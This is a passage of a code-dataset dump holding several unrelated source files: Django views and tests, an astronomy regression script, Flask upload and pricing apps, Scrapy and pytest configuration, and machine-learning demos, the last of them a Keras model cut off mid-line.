django.core.exceptions import PermissionDenied\nfrom rehearsal.models import Rehearsal, Actor, Attendance, Character, Scene, Appearance\nfrom production.view_func import *\n\n\nclass AtndTable(LoginRequiredMixin, TemplateView):\n '''View for the attendance table\n '''\n template_name = 'rehearsal/attendance_table.html'\n \n def get(self, request, *args, **kwargs):\n '''Handler for the request when the page is displayed\n '''\n # Get the production user from the access info and check access rights\n prod_user = accessing_prod_user(self)\n if not prod_user:\n raise PermissionDenied\n \n return super().get(request, *args, **kwargs)\n \n def get_context_data(self, **kwargs):\n '''Modify the parameters passed to the template\n '''\n context = super().get_context_data(**kwargs)\n \n # Pass prod_id for the back button\n prod_id = self.kwargs['prod_id']\n context['prod_id'] = prod_id\n \n # List of rehearsals\n rehearsals = Rehearsal.objects.filter(production__pk=prod_id)\n rhsl_list = [{\n 'id': rhsl.id,\n 'place': str(rhsl.place),\n 'date': rhsl.date.strftime('%Y-%m-%d'),\n 'start_time': rhsl.start_time.strftime('%H:%M'),\n 'end_time': rhsl.end_time.strftime('%H:%M')\n } for rhsl in rehearsals]\n context['rhsls'] = json.dumps(rhsl_list)\n \n # List of actors\n actr_list = list(\n Actor.objects.filter(production__pk=prod_id).order_by('name'))\n\n actrs = [{\n 'name': actr.name,\n 'short_name': actr.get_short_name()\n } for actr in actr_list]\n \n context['actrs'] = json.dumps(actrs)\n \n # Per-actor attendance, as a list aligned with the rehearsal list (3-D array)\n attendances = Attendance.objects.filter(actor__production__pk=prod_id)\n actrs_rhsl_atnds = []\n for actor in actr_list:\n # Attendance records for this actor\n actor_atnds = [atnd for atnd in attendances if atnd.actor == actor]\n rhsl_attnds = []\n for rehearsal in rehearsals:\n # Attendance records for this rehearsal\n slots = sorted(\n [atnd for atnd in actor_atnds if atnd.rehearsal == rehearsal],\n key=attrgetter('from_time')\n )\n atnds = []\n for slot in slots:\n atnds.append(\n # All day\n '*' if slot.is_allday\n # Absent\n else '-' if slot.is_absent\n # Otherwise, a time slot\n else slot.from_time.strftime('%H:%M') + '-'\n + slot.to_time.strftime('%H:%M')\n )\n rhsl_attnds.append(atnds)\n actrs_rhsl_atnds.append(rhsl_attnds)\n \n context['actr_atnds'] = json.dumps(actrs_rhsl_atnds)\n \n # List of characters\n characters = Character.objects.filter(production__pk=prod_id)\n chrs = []\n for character in characters:\n # Get the index of the cast member in actr_list\n if character.cast in actr_list:\n actr_idx = actr_list.index(character.cast)\n else:\n # -1 if there is no cast member\n actr_idx = -1\n chrs.append({\n 'name': character.name,\n 'short_name': character.short_name,\n 'cast_idx': actr_idx\n })\n \n context['chrs'] = json.dumps(chrs)\n \n # List of scene names\n scenes = Scene.objects.filter(production__pk=prod_id)\n context['scenes'] = json.dumps([scn.name for scn in scenes])\n\n # Per-scene list of characters and their line counts\n appearances = Appearance.objects.filter(scene__production__pk=prod_id)\n scenes_chr_apprs = []\n for scene in scenes:\n # Appearances in this single scene\n scene_apprs = [appr for appr in appearances if appr.scene == scene]\n # Average of the valid line counts\n avrg_lines_num = Appearance.average_lines_num(scene_apprs)\n # Line counts for the characters appearing in this scene\n chr_apprs = []\n for chr_idx, character in enumerate(characters):\n apprs = [appr for appr in scene_apprs if appr.character == character]\n if len(apprs) > 0:\n # Line count (the average if set to auto)\n lines_num = avrg_lines_num if apprs[0].lines_auto else apprs[0].lines_num\n chr_apprs.append({\n 'chr_idx': chr_idx,\n 'lines_num': lines_num\n })\n scenes_chr_apprs.append(chr_apprs)\n \n context['scenes_chr_apprs'] = json.dumps(scenes_chr_apprs)\n \n 
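# Each value stored above is a JSON string (rhsls, actrs, actr_atnds, chrs,\n # scenes, scenes_chr_apprs), presumably parsed client-side by the template.\n 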
context\n","sub_path":"rehearsal/views/atnd_table.py","file_name":"atnd_table.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86697974","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom scipy.optimize import least_squares\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nfrom astropy.io import ascii\n\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\n#------------------------------------------------\n\nfilename = 'for_robust_mag_err_0p02_260k_noBLUEEE_Xn1_visP8.dat'\ntbl = ascii.read(filename)\n\ncol_g = 'phot_g_mean_mag'\ncol_bp = 'phot_bp_mean_mag'\ncol_rp = 'phot_rp_mean_mag'\ncol_bp_rp = 'bp_rp'\ncol_bp_g = 'bp_g'\ncol_g_rp = 'g_rp'\n\ncol_g_ps1 = 'g_mean_psf_mag'\ncol_r_ps1 = 'r_mean_psf_mag'\ncol_i_ps1 = 'i_mean_psf_mag'\ncol_z_ps1 = 'z_mean_psf_mag'\ncol_y_ps1 = 'y_mean_psf_mag'\n\n\nconvert_to_numpy_array = ascii.convert_numpy(np.float)[0]\n\n# Если хотим использовать центрированные данные,\n# то centering = True \ncentering = False\n\ndef create_y(cols, centered=True):\n\t# В списке cols может быть либо один column, \n\t# либо два. И надо это будет проверять по его длине\n\t# и затем будет сделан выбор: работаем только со\n\t# значениями в одном фильтре, или с разностью в двух \n\tcol_1 = cols[0]\n\tfilter1 = convert_to_numpy_array(tbl[col_1])\n\tif len(cols) > 1:\n\t\tcol_2 = cols[1]\n\t\tfilter2 = convert_to_numpy_array(tbl[col_2])\n\t\ty = filter1 - filter2\n\telse:\n\t\ty = filter1\n\tif centered == True:\n\t\tmedian_y = np.median(y)\n\t\ty -= median_y\n\t\tglobal m_y\n\t\tm_y = median_y\n\treturn y\n\ndef create_var1(col,centered=True):\n\tx1 = convert_to_numpy_array(tbl[col])\n\tif centered == True:\n\t\tmedian_x1 = np.median(x1)\n\t\tx1 -= median_x1\n\t\tglobal m_x1\n\t\tm_x1 = median_x1\n\treturn x1\n\ndef create_var2(col,centered=True):\n\tx2 = convert_to_numpy_array(tbl[col])\n\tif centered == True:\n\t\tmedian_x2 = np.median(x2)\n\t\tx2 -= median_x2\n\t\tglobal m_x2\n\t\tm_x2 = median_x2\n\treturn x2\n\n\n# m_y, m_x1 и m_x2 будут хранить значение медианы массивов \n# y и переменных x1 и x2 соответственно. Для начала просто\n# создаются эти переменные, и потом, если \n# centering == True, они получат ненулевые значения\nm_y = 0.\nm_x1 =0.\nm_x2 = 0.\n#------------------------------------------------\n\n# В x_cols будут храниться имена переменных -- значений в \n# фильтрах или цвет. 
И тогда в x_degs должно быть указано\n# такое же количество переменных типа integer, которые \n# указывают степень полинома от соответствующей переменной \n# Степень x1 не больше двух, степень x2 не больше трех\n\n# В поле, ограниченное \">>> >>>\", нужно вводить данные\n\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# DATA HERE DATA HERE DATA HERE DATA HERE DATA\n# >>>\ny_cols = [col_i_ps1]\nx_cols = [col_rp,col_bp_rp]\n# x_cols = [col_rp,col_bp_rp]\nx_degs = [1,3]\n# x_degs = [1,3]\n# >>>\n# DATA HERE DATA HERE DATA HERE DATA HERE DATA\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n\n\nif len(x_cols) != len(x_degs):\n\traise SystemExit('STOP: len(x_cols) /= len(x_degs)')\n\ny_array = create_y(y_cols, centering)\n\n# Переменных x может быть одна или две, и они должны быть записаны\n# столбцами в соответствующих степенях.\n# Следующий набор команд это и делает:\nx_var1 = create_var1(x_cols[0], centering)\nx_array = x_var1\nfor i in range(2,x_degs[0]+1):\n\tx_array = np.column_stack((x_array,x_var1**i))\nif len(x_cols) > 1:\n\tx_var2 = create_var2(x_cols[1], centering)\n\tx_array = np.column_stack((x_array,x_var2))\n\tfor i in range(2,x_degs[1]+1):\n\t\tx_array = np.column_stack((x_array,x_var2**i))\t\t\nx_array = sm.add_constant(x_array, prepend=True)\n\n\nrlm_model = sm.RLM(y_array, x_array, M=sm.robust.norms.TrimmedMean())\nresults = rlm_model.fit()\n\n# -----------------------------------------------\n\ndef centering_back(params,degs):\n\tA, B1, C1, B2, C2, D2 = 0., 0., 0., 0., 0., 0. \n\tA = params[0]\n\tif len(degs) == 1:\n\t\tglobal m_x1, m_x2\n\t\t# Потому что при построении x1 было получено m_x1, а \n\t\t# m_x2 так и осталось нулем. 
Но тут я работаю с одной\n\t\t# переменной как со второй (это подтверждают двойки \n\t\t# в названии используемых в этом блоке if переменных\n\t\tm_x1, m_x2 = m_x2, m_x1\n\t\tB2 = params[1]\n\t\tif degs[0] > 1:\n\t\t\tC2 = params[2]\n\t\tif degs[0] > 2:\n\t\t\tD2 = params[3]\n\tif len(degs) == 2:\n\t\tB1 = params[1]\n\t\tif degs[0]>1:\n\t\t\tC1 = params[2]\n\t\t\tB2 = params[3]\n\t\t\tif degs[1] > 1:\n\t\t\t\tC2 = params[4]\n\t\t\tif degs[1] > 2:\n\t\t\t\tD2 = params[5]\n\t\telse:\n\t\t\tB2 = params[2]\n\t\t\tif degs[1] > 1:\n\t\t\t\tC2 = params[3]\n\t\t\tif degs[1] > 2:\n\t\t\t\tD2 = params[4]\n\ta = m_y + A - B1*m_x1 + C1*m_x1**2 - B2*m_x2 + C2*m_x2**2 - D2*m_x2**3\n\tb1 = B1 - 2*C1*m_x1\n\tc1 = C1\n\tb2 = B2 - 2*C2*m_x2 + 3*D2*m_x2**2\n\tc2 = C2 - 3*D2*m_x2\n\td2 = D2\n\tif len(degs) == 1:\n\t\tif degs[0] == 1:\n\t\t\treturn np.array([a,b2])\n\t\telif degs[0] == 2:\n\t\t\treturn np.array([a,b2,c2])\n\t\telse:\n\t\t\treturn np.array([a,b2,c2,d2])\n\telse:\n\t\tif degs[0] == 1:\n\t\t\tif degs[1] == 1:\n\t\t\t\treturn np.array([a,b1,b2])\n\t\t\telif degs[1] == 2:\n\t\t\t\treturn np.array([a,b1,b2,c2])\n\t\t\telse:\n\t\t\t\treturn np.array([a,b1,b2,c2,d2])\n\t\telse:\n\t\t\tif degs[1] == 1:\n\t\t\t\treturn np.array([a,b1,c1,b2])\n\t\t\telif degs[1] == 2:\n\t\t\t\treturn np.array([a,b1,c1,b2,c2])\n\t\t\telse:\n\t\t\t\treturn np.array([a,b1,c1,b2,c2,d2])\n\n\ndef mdisp(X,W):\n M = np.sum(W*X)/np.sum(W)\n sW = np.sum(W)\n V = np.sum(W*(X-M)**2)*sW/(sW**2-np.sum(W**2))\n S = np.sqrt(V)\n return S\n\n# -----------------------------------------------\n\nprint('------------------------------------------')\nprint(filename)\nprint('TukeyBiweight')\nprint('y: '+str(y_cols))\nprint('x: '+str(x_cols))\nprint('x_degs: '+str(x_degs))\nprint('')\n\nprint('Parameters:')\nif centering == True:\n\tparameters = centering_back(results.params,x_degs)\n\tprint(parameters)\n\tprint('')\n\tprint('Centering ON')\n\tprint('Parameters and std err, centered data:')\n\tprint(results.params)\nelse:\n\tparameters = results.params\n\tprint(parameters)\n\tprint('')\n\tprint('Std err:')\n\nprint(results.bse)\nprint('')\nprint('dispersion:')\nprint(mdisp(results.resid,results.weights))\nprint('')\n\npvalues = results.pvalues\nfor i in range(len(pvalues)):\n\tpvalues[i] = round(pvalues[i],3)\nprint('Pvalues:')\nprint(pvalues)\n\n\n\n\n","sub_path":"work/gaia_data/panstarrs1/robust_regression/robust_best_old_ps1.py","file_name":"robust_best_old_ps1.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"609805719","text":"def no_dups(s):\n # base case for error handling\n # if s == \"\":\n # return \"\"\n # dictionary that maps the unique word order (not the count)\n # against the word, ex: {\"we\": 0, \"are\": 1, ...}\n # d = {}\n # # keep a counter of each unique word's order\n # i = 0\n # # iterate over every word\n # for word in s.split():\n # if word in d:\n # # if we've already seen the word, DO NOTHING!\n # continue\n # else:\n # # store the relative order, i, into our dictionary\n # d[word] = i\n # # increment order counter\n # i += 1\n # this code was written to handle situations where the list did not\n # come out correctly sorted, but proved to be unnecessary\n # d = {v: k for k, v in d.items()}\n # l = [None] * i\n # for j in range(0, i):\n # l[j] = d[j]\n # l = [word for word, _ in d.items()]\n\n # in the end, none of the above code was really necessary, except to utilize\n # a dictionary, which I felt was the pedagogical 
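    # Aside: with insertion-ordered dicts (Python 3.7+), the same order-preserving\n    # de-duplication is a one-liner:\n    #     return \" \".join(dict.fromkeys(s.split()))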
    l = []\n    for word in s.split():\n        if word in l:\n            continue\n        else:\n            l.append(word)\n    return \" \".join(l)\n\n\nif __name__ == \"__main__\":\n    print(no_dups(\"\"))\n    print(no_dups(\"hello\"))\n    print(no_dups(\"hello hello\"))\n    print(no_dups(\"cats dogs fish cats dogs\"))\n    print(no_dups(\"spam spam spam eggs spam sausage spam spam and spam\"))\n    print(no_dups(\"banana apple banana app banan taco banan ban banana tac taco taco app apple banana ban taco\"))\n","sub_path":"applications/no_dups/no_dups.py","file_name":"no_dups.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"385389855","text":"from django.test import TestCase\nfrom simulador.models import Consulta\n\n\nclass UsuarioModelTest(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        Consulta.objects.create(id=10,nombre = \"Cesar\",email=\"jnomartinez99@gmail.com\", mensaje=\"soy un mensajito indefenso\")\n    def test_nombre_label(self):\n        consu= Consulta.objects.get(nombre = 'Cesar')\n        field_label = consu._meta.get_field('nombre').verbose_name\n        self.assertEquals(field_label,'nombre')","sub_path":"simulador/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"572193241","text":"\n\nfrom xai.brain.wordbase.nouns._tumult import _TUMULT\n\n#class header\nclass _TUMULTS(_TUMULT, ):\n\tdef __init__(self,): \n\t\t_TUMULT.__init__(self)\n\t\tself.name = \"TUMULTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"tumult\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_tumults.py","file_name":"_tumults.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"257586560","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom ..utils import downsample_block\n\n\nclass P2PDiscriminator(nn.Module):\n    def __init__(self, img_size, in_channels=3):\n        super(P2PDiscriminator, self).__init__()\n\n        self.model = nn.Sequential(\n            *downsample_block(in_channels * 2, 64, bn=False),\n            *downsample_block(64, 128),\n            *downsample_block(128, 256),\n            *downsample_block(256, 512),\n            nn.ZeroPad2d((1, 0, 1, 0)),\n            nn.Conv2d(512, 1, 4, padding=1, bias=False)\n        )\n\n    def forward(self, img_A, img_B):\n        img_input = torch.cat((img_A, img_B), 1)\n        return self.model(img_input)\n\n","sub_path":"torch_gan/discriminators/pix2pix.py","file_name":"pix2pix.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"335312969","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nhist_types = [\"grayvalue\", \"rg\", \"rgb\", \"dxdy\"]\ndist_types = [\"chi2\", \"intersect\", \"l2\"]\ncolors = [\"r\", \"g\", \"b\"]\n\nfor index, hist_type in enumerate(hist_types):\n    plt.subplot(2, 2, index+1)\n    for idx, dist_type in enumerate(dist_types):\n        path = r\"./rpc_{}_{}.csv\".format(hist_type, dist_type)\n        data = np.genfromtxt(path, delimiter=\";\", names=[\"recall\", \"precision\"])\n\n        plt.plot(data[\"precision\"], data[\"recall\"], color=colors[idx])\n\n    plt.title(hist_type + \" histogram\")\n    plt.axis([0, 1, 0, 1]);\n    plt.xlabel('1 - precision');\n    plt.ylabel('recall');\n    plt.legend(dist_types, loc='best')\n\nplt.show()\n
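# Each rpc_<hist>_<dist>.csv is assumed to hold one ';'-separated row per\n# operating point, read above as (recall, precision) columns -- e.g. 0.90;0.15.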
\nfor index, hist_type in enumerate([\"rg\", \"rgb\"]):\n    for idx, dist_type in enumerate(dist_types):\n        path = r\"./rpc_{}_{}.csv\".format(hist_type, dist_type)\n        data = np.genfromtxt(path, delimiter=\";\", names=[\"recall\", \"precision\"])\n        plt.plot(data[\"precision\"], data[\"recall\"], label=\"{} - {}\".format(hist_type, dist_type))\n    \nplt.title(\"RG histogram vs RGB histogram\")\nplt.axis([0, 1, 0, 1]);\nplt.xlabel('1 - precision');\nplt.ylabel('recall');\nplt.legend()\nplt.show()\n","sub_path":"Assignment1/Identification/rpc_results/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"482340965","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\n\ndef pytest_addoption(parser):\n    parser.addoption('--language', action='store', default='ru',\n                     help=\"Choose language: e.g. ru or en\")\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n    user_language = request.config.getoption(\"--language\")\n    print(f\"\\nstart browser for test in {user_language}\")\n    options = Options()\n    options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n    browser = webdriver.Chrome(options=options)\n    link = f\"http://selenium1py.pythonanywhere.com/{user_language}/catalogue/coders-at-work_207/\"\n    browser.get(link)\n    time.sleep(30)\n    yield browser\n    print(\"\\nquit browser..\")\n    browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"164203739","text":"from flask import Flask, flash, make_response, render_template, request, redirect, escape, jsonify, Response, url_for\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES\nimport json\nimport os\nimport datetime\nimport pathlib\nfrom functions import *\nfrom werkzeug.utils import secure_filename\nimport pprint\nfrom PIL import Image\n\nALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])\n\napp = Flask(__name__)\n\nbasedir = pathlib.Path.cwd()\n\n\n@app.route('/')\ndef home():\n\treturn 'You suck'\n\n@app.route('/gregory')\ndef gregory():\n\tresp = make_response('howdy')\n\tresp.set_cookie('family', 'gregory')\n\treturn resp\n\n@app.route('/havens')\ndef havens():\n\tresp = make_response('howdy')\n\tresp.set_cookie('family', 'havens')\n\treturn resp\n\n@app.route('/status')\ndef status():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\treturn 'The family is ' + family\n\telse:\n\t\treturn redirect(url_for('home'))\n\n@app.route('/activity_picker')\ndef activity_picker():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\tdata = grab_from_storage(family, basedir)\n\t\treturn render_template('activity_picker.html', data=data)\n\telse:\n\t\tredirect(url_for('home'))\n\n@app.route('/apply_activity', methods=['POST'])\ndef apply_activity():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\tdata = grab_from_storage(family, basedir)\n\t\tactivity_selected = request.form['activity_selected']\n\t\tcurrent_activity = pull_activity_dict(activity_selected, data)\n\t\treturn render_template('collect_info.html', current_activity=current_activity)\n\n\telse:\n\t\tredirect(url_for('home'))\n\nphotos = UploadSet('photos', IMAGES)\napp.config['UPLOADED_PHOTOS_DEST'] = basedir / 'static' / 'long_term_storage' / 'uploads'\nconfigure_uploads(app,
photos)\n\n@app.route('/confirm_info', methods=['POST'])\ndef confirm_info():\n\tif 'family' in request.cookies:\n\t\tfamily = request.cookies.get('family')\n\t\tdata = grab_from_storage(family, basedir)\n\t\tactivity_selected = request.form['activity_selected']\n\t\tprint(family)\n\t\tprint(activity_selected)\n\t\tcurrent_activity = pull_activity_dict(activity_selected, data)\n\t\ttry:\n\t\t\tdetails_input_data = request.form['details_input']\n\t\t\tprint('details_input: ' + details_input_data)\n\t\t\tcurrent_activity['details_input'] = details_input_data\n\t\texcept:\n\t\t\tpass\n\n\n\t\tall_form_data = request.form\n\t\tprint(all_form_data)\n\t\tphoto_target = basedir / 'static' / 'long_term_storage' / family\n\t\tprint(photo_target)\n\t\tif request.method == 'POST' and 'photo' in request.files:\n\t\t\ttry:\n\t\t\t\tfilename = photos.save(request.files['photo'])\n\t\t\t\tprint(filename)\n\t\t\t\talert_box_class = 'nice_message'\n\t\t\t\tresults = 'SUCCESS! If you would like to upload another, please do so now.'\n\t\t\texcept:\n\t\t\t\talert_box_class = 'error_message'\n\t\t\t\tresults = 'You have tried to upload a filetype other than PNG, please try again.'\n\t\t\t\treturn render_template('upload.html', results=results, alert_box_class=alert_box_class)\n\n\t\tphoto_description = '-' + request.form['photo_description']\n\t\tprint('photo description: ' + photo_description)\n\t\trecent_photo_location = basedir / 'static' / 'long_term_storage' / 'uploads' / filename\n\t\tcurrent_suffix = recent_photo_location.suffix\n\t\tprint(recent_photo_location)\n\t\tphoto_name = current_activity['Activity'].replace(\" \", \"_\")\n\t\tphoto_name = photo_name[:20]\n\t\tphoto_name_plus_description = photo_name + photo_description + current_suffix\n\t\trecent_photo_new_name = basedir / 'static' / 'long_term_storage' / 'uploads' / photo_name_plus_description\n\t\trecent_photo_new_location = basedir / 'static' / 'long_term_storage' / family / 'photos' / photo_name_plus_description\n\t\tos.rename(recent_photo_location, recent_photo_new_name)\n\t\twith recent_photo_new_location.open(mode='xb') as f:\n\t\t\tf.write(recent_photo_new_name.read_bytes())\n\t\trecent_photo_new_name.unlink()\n\n\t\tif 'photo_list' not in current_activity:\n\t\t\tcurrent_activity['photo_list'] = []\n\t\t\tprint('created photo_list list')\n\t\tcurrent_activity['photo_list'].append(photo_name_plus_description)\n\t\tsize = 300, 300\n\n\t\tthumbnail_name_plus_description = photo_name + photo_description + '_thumb' + current_suffix\n\t\trecent_photo_new_thumb_location = basedir / 'static' / 'long_term_storage' / family / 'thumbs' / thumbnail_name_plus_description\n\t\tim = Image.open(recent_photo_new_location)\n\t\tim.thumbnail(size)\n\t\tim.save(recent_photo_new_thumb_location)\n\n\t\tif 'thumb_list' not in current_activity:\n\t\t\tcurrent_activity['thumb_list'] = []\n\t\t\tprint('created thumb_list list')\n\t\tcurrent_activity['thumb_list'].append(thumbnail_name_plus_description)\n\n\t\tcurrent_activity['is_complete'] = True\n\n\t\tpush_activity_dict(current_activity, data, family, basedir)\n\n\t\tpprint.pprint(current_activity)\n\t\treturn render_template('collect_info.html', current_activity=current_activity, results=results, alert_box_class=alert_box_class)\n\n\telse:\n\t\tredirect(url_for('home'))\n\nif __name__ == '__main__':\n\t# app.run()\n\tapp.run(debug=True, 
host='0.0.0.0')\n","sub_path":"old-venture.py","file_name":"old-venture.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"249044259","text":"import json\n\nfrom flask import (Blueprint, jsonify, request)\n\nfrom pricing_service.api.models import Product, VATBand\n\napi = Blueprint('api', __name__)\n\n\ndef product_lookup(all_products, product):\n product_id = product.get('product_id', 0)\n product_obj = all_products.get(product_id)\n return product_obj\n\n\ndef product_sub_total(price, quantity):\n return round(price * quantity) \n\n\ndef vat_band(vatband, price):\n return round(price * vatband.rate)\n\n\n@api.route('/products', methods=['POST'])\ndef post_products():\n all_products = {product.id: product for product in \\\n Product.query.all()}\n data = request.json\n response_data = {}\n prices = []\n price_total = 0\n vat_total = 0\n for product in data['order']['items']:\n product_obj = product_lookup(all_products, product)\n sub_total = product_sub_total(product_obj.price, product['quantity'])\n vat = vat_band(product_obj.vatband, sub_total)\n price_total += sub_total\n vat_total += vat\n prices.append({'product_id': product_obj.id,\n 'sku': product_obj.sku,\n 'name': product_obj.name,\n 'quantity': product['quantity'],\n 'price': sub_total,\n 'vat': vat, \n 'vat_band': product_obj.vatband.name})\n \n response_data['prices'] = prices\n response_data['totals'] = {'vat': vat_total, 'price': price_total}\n response_data['vat_bands'] = {band.name: band.rate for band in \\\n VATBand.query.all()}\n return jsonify(response_data)\n","sub_path":"pricing_service/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371059771","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for dob project\n#\n# For simplicity, this file contains only the most important settings by\n# default. 
All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'dob'\n\nSPIDER_MODULES = ['dob.spiders']\nNEWSPIDER_MODULE = 'dob.spiders'\nITEM_PIPELINES = {\n\t'dob.pipelines.dobItemPipeline':300,\n\t'dob.pipelines.PostAvatarPipeline':200,\n\t}\nIMAGES_STORE = '/root/dobImage'\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'dob (+http://www.yourdomain.com)'\nDOWNLOAD_DELAY = 4\nRANDOMIZE_DOWNLOAD_DELAY = True\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 OPR/23.0.1522.60\"\nCOOKIES_ENABLED = False\nDOWNLOADER_MIDDLEWARES ={\n 'scrapy.contrib.downloadermiddleware.httpproxy.HttpProxyMiddleware': 543,\n\t#'dob.middlewares.ProxyMiddleware': 100,\n}","sub_path":"dobspider/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"120489347","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../')\nfrom loglizer.models import DecisionTree\nfrom loglizer import dataloader, preprocessing\n\nstruct_log = '../data/HDFS/HDFS_100k.log_structured.csv' # The structured log file\nlabel_file = '../data/HDFS/anomaly_label.csv' # The anomaly label file\n\nif __name__ == '__main__':\n (x_train, y_train), (x_test, y_test) = dataloader.load_HDFS(struct_log,\n label_file=label_file,\n window='session', \n train_ratio=0.5,\n split_type='uniform')\n\n feature_extractor = preprocessing.FeatureExtractor()\n x_train = feature_extractor.fit_transform(x_train, term_weighting='tf-idf')\n x_test = feature_extractor.transform(x_test)\n\n model = DecisionTree()\n model.fit(x_train, y_train)\n\n print('Train validation:')\n precision, recall, f1 = model.evaluate(x_train, y_train)\n\n print('Test validation:')\n precision, recall, f1 = model.evaluate(x_test, y_test)\n","sub_path":"demo/DecisionTree_demo.py","file_name":"DecisionTree_demo.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"353482645","text":"import tensorflow as tf\nimport numpy as np\nimport csv\nimport cv2 \nimport json\nimport h5py\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom keras.layers import Activation, Dense, Dropout, ELU, Flatten, Input, Lambda\nfrom keras.layers.convolutional import Convolution2D, Cropping2D\nfrom keras.models import Sequential, Model, load_model, model_from_json\nfrom keras.regularizers import l2\n\nfrom preprocessing import preprocess, flipImg\nfrom utils import get_data, validAngle, getRandImgAndAngle\n\n# Weird workaround for cuda error, but it is working :) \nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\nBATCH_SIZE = 64\nEPOCHS = 1\n\ndef model_nvidia():\n \"\"\"\n Model according to the given Nvidia paper. Has to be defined here due to weird unicode error when model.save \n Note. 
The model must be defined in this file for model.save_weights to work; it cannot be split into a separate module.\n    \"\"\"\n    weights_regularizer=l2(0.001)\n\n    model = Sequential()\n    # Image normalization via a Lambda layer\n    model.add(Lambda(lambda x: x / 127.5 - 1., input_shape=(66, 200, 3)))\n    model.add(Convolution2D(24, 5, 5, border_mode='valid', activation='elu', subsample=(2, 2), init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.1))\n    model.add(Convolution2D(36, 5, 5, border_mode='valid', activation='elu', subsample=(2, 2), init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.2))\n    model.add(Convolution2D(48, 5, 5, border_mode='valid', activation='elu', subsample=(2, 2), init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.2))\n    model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='elu', subsample=(1, 1), init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.2))\n    model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='elu', subsample=(1, 1), init='he_normal', W_regularizer=weights_regularizer))\n\n    model.add(Flatten())\n    model.add(Dropout(.3))\n    model.add(Dense(100, activation='elu', init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.5))\n    model.add(Dense(50, activation='elu', init='he_normal', W_regularizer=weights_regularizer))\n    model.add(Dropout(.5))\n    model.add(Dense(10, 